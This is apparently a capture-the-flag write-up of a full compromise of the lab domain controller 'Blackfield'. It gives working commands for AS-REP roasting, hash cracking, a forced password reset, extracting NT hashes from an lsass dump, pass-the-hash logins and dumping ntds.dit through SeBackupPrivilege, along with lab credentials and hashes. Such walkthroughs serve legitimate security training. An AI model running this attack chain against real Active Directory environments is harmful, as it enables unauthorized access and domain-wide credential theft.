Nmap scan

We begin by doing a nmap scan on the target IP (10.10.10.192).

1
**nmap -sCV -T4 --min-rate 10000 -v -oA nmap/tcp_default 10.10.10.192**
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Nmap 7.93 scan initiated Wed Nov 30 10:28:13 2022 as: nmap -sCV -T4 --min-rate 10000 -v -oA nmap/tcp_default 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.025s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-30 22:28:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-11-30T22:28:26
|_  start_date: N/A
|_clock-skew: 6h59m59s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 30 10:29:02 2022 -- 1 IP address (1 host up) scanned in 48.62 seconds

The above nmap scan shows us that we are dealing with a Windows Active Directory server. This can be concluded since LDAP is running. Also under service info there is a host “DC01” which means Domain Controller. The following information can be gathered trough the nmap scan:

  • SMB is opened
  • LDAP is running
  • Domain = blackfield.local
  • DNS is running

After adding blackfield.local to the host file we can do a dig to reveal DNS information.

Doing a dig for the domain

We can use dig to reveal DNS information about the domain

1
**dig any blackfield.local @10.10.10.192**
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<<>> DiG 9.18.8-1-Debian <<>> any blackfield.local @10.10.10.192
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12014
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;blackfield.local.              IN      ANY

;; ANSWER SECTION:
blackfield.local.       600     IN      A       10.10.10.192
blackfield.local.       3600    IN      NS      **dc01.blackfield.local.**
blackfield.local.       3600    IN      SOA     **dc01.blackfield.local.** hostmaster.blackfield.local. 162 900 600 86400 3600

;; ADDITIONAL SECTION:
dc01.blackfield.local.  3600    IN      A       10.10.10.192
dc01.blackfield.local.  3600    IN      AAAA    dead:beef::c1ed:d29f:1c64:2499

;; Query time: 20 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (TCP)
;; WHEN: Thu Dec 01 06:14:27 EST 2022
;; MSG SIZE  rcvd: 171
  • We also add dc01.blackfield.local to the hostfile because this is likely the FQDN for the Domain Controller.

Finding usernames in profiles$ share

We will begin by taking a look at SMB running on port 445.

1
**smbclient -L \\10.10.10.192**
1
2
3
4
5
6
7
8
9
Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share

It is possible to list shares anonymously. This can mean that we can also interact with shares. Only for the share profiles$, we can anonymously list the contents:

1
**smbclient \\\\10.10.10.192\\profiles$**

There are a lot of profiles on the share. All directories. We can recursively download all directories using smbclient:

1
2
3
4
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

Next we can reveal the content of each directory using ls:

1
ls -la *

All directories are empty. But we do have a list of possible usernames for the DC. After doing some editing on the ls output, we have a list of 319 users.

1
cat tempusers.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

--snipped--
XDebes
XKonegni
XRykiel
YBleasdale
YHuftalin
YKivlen
YKozlicki
YNyirenda
YPredestin
YSeturino
YSkoropada
YVonebers
YZarpentine
ZAlatti
ZKrenselewski
ZMalaab
ZMiick
ZScozzari
ZTimofeeff
ZWausik

ASREP Roasting userlist

AS-REP roasting is an attack against Kerberos for user that don't require preauthentication

We can use impacket to see if any users have set this vulnerable option on their account and possibly get a hash that we can crack. We also can find valid usersnames this way, because impacket tells us which usernames do not have the preauthentication option set.

1
**impacket-GetNPUsers blackfield.local/ -usersfile tempusers.txt -request -format hashcat -outputfile hashes.txt**

This saves the hashes it found to a file named hashes.txt in a format for hashcat:

We do find one account “support” that has doesn’t require preauthentication and gives us the hash! lets try to crack the hash to get a password. But first let’s see which users are also valid on the DC:

1
2
impacket-GetNPUsers blackfield.local/ -usersfile tempusers.txt -request -format hashcat -outputfile hashes.txt |
 grep "User"

Because we grep “User” it only shows us the valid accounts in the output:

1
2
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

This gives us a users.txt list of:

1
2
3
audit2020
svc_backup
support

Cracking the kerberos hash

We can use hashcat to crack the kerberos hash:

1
hashcat -a0 hashes.txt /usr/share/wordlists/rockyou.txt

The hash is cracked and the password for support is #00^BlackKnight

Verifying credentials for support

We can use crackmapexec to verify the credentials:

1
crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'

We see a green [+] which means we can authenticate to SMB using the specified credentials.

Using python-bloodhound to find misconfigurations

We will authenticate as support to LDAP using python-bloodhound to find misconfigurations on the domain:

1
bloodhound-python -d blackfield.local -u support -p '#00^BlackKnight' -ns 10.10.10.192 -c All

By clicking on the node info for compromised user “support” there is one “First Degree Object Control” found.

By clicking on it we can see the following in bloodhound:

User support is able to “ForceChangePassword” for user audit2020. Bloodhound says the following:

“_The user SUPPORT@BLACKFIELD.LOCAL has the capability to change the user AUDIT2020@BLACKFIELD.LOCAL‘s password without knowing that user’s current password._”

Changing password for user audit2020 using rpcclient

One way to exploit this vulnerability is using rpcclient to change user audit2020 it’s password. https://malicious.link/post/2017/reset-ad-user-password-with-linux/

1
rpcclient -U support //10.10.10.192

After authenticating as user support, we can use “setuserinfo2” to change the password for audit202:

1
rpcclient $> setuserinfo2 audit2020 23 Incendium123!

Verifying changed password for user audit2020

After changing the password for user audit2020 we must verify it using crackmapexec:

1
crackmapexec smb 10.10.10.192 -u audit2020 -p Incendium123!

And indeed the password is changed. We can also list the SMB shares and the privileges that audit2020 has on the available shares:

1
crackmapexec smb 10.10.10.192 -u audit2020 -p Incendium123! --shares
  • User audit2020 is also able to interact with the share “forensic”

Finding memory dumps in forensic share

Let’s use smbclient once again to authenticate to the share “forensic” as user “audit2020”

1
smbclient \\\\10.10.10.192\\forensic -u audit2020

There are three folders, one folder contains memory dumps in zip files:

  • One zip stands out. This is the lsass zip file. Local Security Authority Server Service is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. It also writes to the Windows Security Log.

This dump can contain session hashes (NTLM) that we can use to authenticate to the DC.

We can use get to download the lsass.zip file to our localhost:

1
smb: \memory_analysis\> get lsass.zip

Dumping hashes using pypykatz

We first unzip the zip file and get a lsass.DMP file:

We can use pypykatz to find hashes in this memory DMP file:

1
**pypykatz lsa minidump lsass.DMP | grep NT**

This gives us a list of hashes that we can use to authenticate. Remember that we still have one other user in mind. This is the svc_backup account that showed up as valid. We can try to see if one of these session hashes is valid for the account using crackmapexec.

1
crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
  • Notice that we used winrm instead of SMB. This is because bloodhound showed that user svc_backup is in the remote management group:

PE to Administrator

We first authenticate with evil-winrm to the server as svc_backup:

1
evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

After authenticating, we will confirm our privileges:

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
**SeBackupPrivilege             Back up files and directories  Enabled**
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
  • Bloodhound also told us that svc_backup is member of the “backup operators” group.

Exploiting the SeBackupPrivilege token

This privilege causes the system to grant all read access control to any file (only read). There are some github repos available that have scripts to exploit this privilege:

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

Using evil-winrm we will upload these two .dll files and import them:

1
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload ./pe/SeBackupPrivilegeCmdLets.dll
1
2
*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeUtils.dll
  • This gives us privileges to copy files all of the system. But for some reason it will not be able to get files from the administrator desktop.

Using diskshadow to get the ntds.dit file

We want to get the ntds.dit file to get all the hashes for the domain. This way we can authenticate as administrator. We will do this by making a script for diskshadow to create a backup of the C:/ drive to our Z:/ drive that we have full control of. After that we will download the ntds.dit file and use secretsdump to retrieve hashes.

We will first need a script:

1
2
3
4
5
6
set context persistent nowriters
set metadata c:\programdata\df.cab
set verbose on
add volume c: alias df
create
expose %df% z:

This scripts mounts the C:/ drive to the Z:/ drive using VSS. We will need to use a tool to make this readable by DOS. using unix2dos:

1
unix2dos script.txt

Next upload the script:

1
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload pe/script.txt

And finally use diskshadow to execute the script:

1
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt

It worked. Now we can change our directory to Z:/Windows/ntds and download the ntds.dit file to our localhost:

1
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd Z:/Windows/ntds

We will also need the system reg for secretsdump to retrieve the hashes:

1
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system.bk

Using secretsdump to get all domain hashes

Now we can use secretsdump to get all of the domain hashes:

1
impacket-secretsdump -system system.bk -ntds ntds.dit LOCAL > domain_hashes.txt

There’re a lot of hashes, but the one that is interesting is of course Administrator:

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::

Using evil-winrm to authenticate as Administrator:

1
evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee